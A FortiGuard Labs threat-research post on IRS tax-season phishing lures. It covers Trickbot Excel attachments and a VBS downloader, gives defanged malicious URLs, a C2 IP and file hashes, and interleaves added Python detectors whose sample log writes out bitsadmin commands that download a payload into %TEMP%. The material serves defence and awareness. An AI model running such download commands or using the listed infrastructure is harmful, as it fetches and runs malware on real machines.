FortiGuard Labs Threat Research Report
The tax deadline is fast approaching. It’s that time of the year when individuals and organizations scramble to file their forms. And like clockwork, malicious actors predictably try to cash in on this yearly event, and the FortiGuard Labs team has noticed.
Perhaps the most important takeaway from this blog is that ANY email claiming to be from the IRS is a scam. That is your first and best clue. In fact, as a word of warning, the United States Internal Revenue Service specifically states that it "will not initiate email contact with you without your consent."
And yet, every year, threat actors take advantage of the fact that not everyone knows this particular IRS policy. And as a result, they manage to successfully prey on individuals who are either worried or confused about filing their taxes.
In this blog, we will show you a number of lures being used by these criminals, how they are being used, and what you can do about them.
Nearly every email-based attack involves tricking the recipient into opening a file or clicking on a link that carries malicious code. These are typically documents or spreadsheets with macros that install malware on the user's device, links to malicious websites, or actual executables that launch malware directly.
The first email lure we will discuss attempts to trick the user into opening an attached Excel sheet by pretending that it is a new form related to recent Covid-19 policy changes.
It pretends to have been sent from an administrative assistant working in the IRS Head Department. (A careful observer would notice that the term “head department” sounds contrived. That’s because it is. There is no such thing as a “head department” in the IRS, or frankly, in any US-based agency. It’s a clue that the attackers are likely from another country.)
Combining both taxes and Covid is designed to make the target more apprehensive and increase the likelihood that the attachment is viewed. The attachment itself is a malicious Excel binary workbook that eventually attempts to download and execute a DLL file from hxxp://sported[.]xyz. This particular tax lure is used by the Trickbot group.
Not to be outdone, a similar tax-related lure can be seen in the following email sent in the same week.
While trying to look official, this fake email contains both spelling and grammar mistakes. The link in the email body goes to hxxp://enter[.]prologin[.]net/assets2/global/plugins/amcharts/type[.]php. (Hovering your mouse over a link will reveal its true web address. Besides the fact that the IRS never sends communications via email, any government link would include a .gov top level domain. In this case, you can see that this is a .net domain, which has its own uses explained here.)
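The two checks this paragraph describes, whether a message invokes the IRS at all and whether every link in it resolves to a .gov host once the defanged hxxp/[.] notation is undone, can be expressed as a small mail-filter rule. The following Python is an added illustration, not FortiGuard's own tooling; the prologin URL is the one quoted above, and every other value (sender, subject, the irs.gov and example.net URLs) is constructed.

```python
"""Flag messages that invoke the IRS but link outside the .gov TLD.

Added illustration, not FortiGuard's own tooling. The prologin URL is the
one quoted in the post; every other value here is constructed.
"""
import re
from urllib.parse import urlparse

# Matches live and defanged (hxxp, [.]) links as they appear in mail bodies.
URL_RE = re.compile(r"\b(?:https?|hxxps?)://[^\s<>\"']+", re.IGNORECASE)
IRS_RE = re.compile(r"\b(?:irs|internal revenue service)\b", re.IGNORECASE)


def refang(url: str) -> str:
    """Undo defanging so urlparse sees a normal URL."""
    url = re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)
    return url.replace("[.]", ".").replace("[:]", ":")


def tld(url: str) -> str:
    """Lower-cased top-level domain of the URL's host ('' if unparseable)."""
    host = urlparse(refang(url)).hostname or ""   # hostname is already lower-cased
    return host.rsplit(".", 1)[-1] if "." in host else ""


def claims_irs(msg: dict) -> bool:
    """True if the sender line or subject presents the mail as IRS business."""
    return any(IRS_RE.search(msg.get(k, "")) for k in ("from", "subject"))


def non_gov_links(msg: dict) -> list:
    """Body links whose host is not under .gov. Subdomain tricks such as
    irs.gov.example.net still end in .net, so they are caught too."""
    return [u for u in URL_RE.findall(msg.get("body", "")) if tld(u) != "gov"]


def assess(msg: dict) -> dict:
    """Apply the post's rules: an IRS claim in email is itself the scam
    signal (the IRS does not initiate email contact), and a non-.gov link
    under that claim is a second, independent one worth reporting."""
    irs = claims_irs(msg)
    links = non_gov_links(msg) if irs else []
    verdict = "quarantine" if irs else "pass"
    return {"claims_irs": irs, "non_gov_links": links, "verdict": verdict}


if __name__ == "__main__":
    sample = {  # constructed, modelled on the lure described above
        "from": "Tax Office <assistant@example.net>",
        "subject": "IRS: Covid-19 relief form update",
        "body": "Review the form at hxxp://enter[.]prologin[.]net/assets2/global/plugins/amcharts/type[.]php",
    }
    print(assess(sample))
```

The verdict is driven by the IRS claim alone, exactly as the post advises; the link check is kept separate so the non-.gov host can be reported as an indicator rather than being the only thing the rule depends on.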
After some redirection through the hxxps://[hacked domain]/unconvincingly[.]php page, the script downloads a zip file from a legitimate domain for a judicial branch of the United States government. (We have also reached out to this agency so they can take appropriate remediation steps.) This archive contains a VBS file that hides malicious code inside innocuous junk code to try and make itself look benign.
This VBS file uses COM to launch both wscript and cscript, as well as the cmd and bitsadmin tools, to download a file from the hxxp://23[.]227[.]198[.]243/static/settings/ directory and save it as %temp%/ScalabilityFix.tmp. Currently, the C2 server is not serving the next stage. The campaign may already be over, or the C2 server may be waiting for a specific target to visit this watering hole.
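The process chain just described (a script host spawning cmd, which spawns bitsadmin to pull a remote file into %temp%) is visible in ordinary process-creation telemetry, and the pattern is a better detection anchor than the C2 address, which can change. The Python below is an added illustration, not FortiGuard's own detection content: the five process events are constructed (203.0.113.x are documentation addresses and the payload filename is a placeholder), and the scoring threshold is an assumption chosen so that a lone bitsadmin transfer from an interactive shell does not fire.

```python
"""Flag bitsadmin downloads launched from a script host into %temp%.

Added illustration, not FortiGuard's own detection content. The process
events are constructed; only the wscript -> cmd -> bitsadmin -> %temp%
shape mirrors the VBS stage described in the post.
"""
import csv
import io
import re

# Constructed process-creation events in a flat CSV shape (time, pid, ppid,
# image, command line), the fields any EDR or Sysmon Event ID 1 feed carries.
SAMPLE_LOG = """\
time,pid,ppid,image,cmdline
10:00:01,400,100,C:\\Windows\\explorer.exe,explorer.exe
10:00:05,512,400,C:\\Windows\\System32\\wscript.exe,wscript.exe C:\\Users\\u\\Downloads\\form.vbs
10:00:06,530,512,C:\\Windows\\System32\\cmd.exe,cmd.exe /c bitsadmin /transfer job /download /priority high http://203.0.113.10/static/settings/payload %TEMP%\\ScalabilityFix.tmp
10:00:06,541,530,C:\\Windows\\System32\\bitsadmin.exe,bitsadmin /transfer job /download /priority high http://203.0.113.10/static/settings/payload %TEMP%\\ScalabilityFix.tmp
10:05:00,600,400,C:\\Windows\\System32\\bitsadmin.exe,bitsadmin /transfer upd /download http://203.0.113.20/update.msi C:\\ProgramData\\update.msi
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # the hosts named in the post
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
TEMP_RE = re.compile(r"(%temp%|\\temp\\)", re.IGNORECASE)
ALERT_THRESHOLD = 2   # assumption: one weak signal alone is not enough


def basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerating either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> dict:
    """Index events by pid so parent chains can be walked."""
    return {int(r["pid"]): r for r in csv.DictReader(io.StringIO(text))}


def lineage(events: dict, pid: int) -> list:
    """Image names from the process up through its known ancestors."""
    chain, seen = [], set()
    while pid in events and pid not in seen:
        seen.add(pid)
        chain.append(basename(events[pid]["image"]))
        pid = int(events[pid]["ppid"])
    return chain


def detect(events: dict) -> list:
    """Score every bitsadmin /transfer by the signals the post describes."""
    findings = []
    for pid, ev in events.items():
        cmd = ev["cmdline"]
        if basename(ev["image"]) != "bitsadmin.exe" or "/transfer" not in cmd.lower():
            continue
        chain = lineage(events, pid)
        reasons = []
        if URL_RE.search(cmd):
            reasons.append("remote URL")
        if TEMP_RE.search(cmd):
            reasons.append("writes to temp")
        if any(p in SCRIPT_HOSTS for p in chain[1:]):
            reasons.append("spawned by script host")
        if len(reasons) >= ALERT_THRESHOLD:
            findings.append({"pid": pid, "chain": " <- ".join(chain),
                             "reasons": reasons, "score": len(reasons)})
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f"pid {f['pid']} score {f['score']}: {f['chain']} ({', '.join(f['reasons'])})")
```

Walking the parent chain rather than matching only the bitsadmin command line is what separates the VBS-driven download from an administrator's own transfer: the same tool with the same switches scores 1 under explorer.exe and 3 under wscript.exe.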
As tax season approaches, so do the scams. We are already seeing attacks, and we expect to see a lot more malicious activity over the next few weeks. Users need to be diligent, as some of these scams are getting more believable. When other matters like the pandemic or deadlines about money are on a person's mind, a carefully crafted email may slip through the cracks. At such a time, it is important to remember that the IRS never communicates with citizens using email. With that in mind, and with some careful diligence, you should be able to avoid being a victim this tax season.
Being prepared against such inevitable attacks can take many forms to ensure a robust security strategy. The following protections can be put in place to mitigate a threat before it ever reaches the network.
In addition, Fortinet customers are directly protected from the malicious attacks detailed in this blog.
Customers running the latest FortiClient Antivirus definitions are protected by the following signatures:
Malicious Excel file MD5: 9236b9c6aa22afd71b5309997ee95c85
Malicious VBS file MD5: 7D8273BB0912B2F3ADD7609C24F317C0
Detection Name: VBS/Agent.VDK!tr
The following network IOCs are currently blocked by FortiGuard Web Filtering: